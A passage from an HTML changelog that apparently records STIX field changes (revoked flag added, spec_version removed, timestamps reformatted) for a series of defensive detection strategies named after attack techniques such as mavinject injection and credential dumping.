1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.686000+00:00</td></tr></tbody></table></details><hr><h4>[DET0500] Detecting Abnormal SharePoint Data Mining by Privileged or Rare Users</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.685000+00:00</td></tr></tbody></table></details><hr><h4>[DET0263] Detecting Bulk or Anomalous Access to Private Code Repositories via SaaS Platforms</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.678000+00:00</td></tr></tbody></table></details><hr><h4>[DET0433] Detecting Code Injection via mavinject.exe (App-V Injector)</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.679000+00:00</td></tr></tbody></table></details><hr><h4>[DET0350] Detecting Downgrade Attacks</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.679000+00:00</td></tr></tbody></table></details><hr><h4>[DET0025] Detecting Electron Application Abuse for Proxy Execution</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.694000+00:00</td></tr></tbody></table></details><hr><h4>[DET0011] Detecting Junk Data in C2 Channels via Behavioral Analysis</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.690000+00:00</td></tr></tbody></table></details><hr><h4>[DET0222] Detecting MMC (.msc) Proxy Execution and Malicious COM Activation</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.697000+00:00</td></tr></tbody></table></details><hr><h4>[DET0044] Detecting Malicious Browser Extensions Across Platforms</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.669000+00:00</td></tr></tbody></table></details><hr><h4>[DET0506] Detecting Mshta-based Proxy Execution via Suspicious HTA or Script Invocation</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.684000+00:00</td></tr></tbody></table></details><hr><h4>[DET0593] Detecting OS Credential Dumping via /proc Filesystem Access on Linux</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.694000+00:00</td></tr></tbody></table></details><hr><h4>[DET0486] Detecting Odbcconf Proxy Execution of Malicious DLLs</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.685000+00:00</td></tr></tbody></table></details><hr><h4>[DET0440] Detecting PowerShell Execution via SyncAppvPublishingServer.vbs Proxy Abuse</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.690000+00:00</td></tr></tbody></table></details><hr><h4>[DET0470] Detecting Protocol or Service Impersonation via Anomalous TLS, HTTP Header, and Port Mismatch Correlation</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.681000+00:00</td></tr></tbody></table></details><hr><h4>[DET0528] Detecting Remote Script Proxy Execution via PubPrn.vbs</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.677000+00:00</td></tr></tbody></table></details><hr><h4>[DET0235] Detecting Steganographic Command and Control via File + Network Correlation</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.668000+00:00</td></tr></tbody></table></details><hr><h4>[DET0550] Detecting Suspicious Access to CRM Data in SaaS Environments</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: 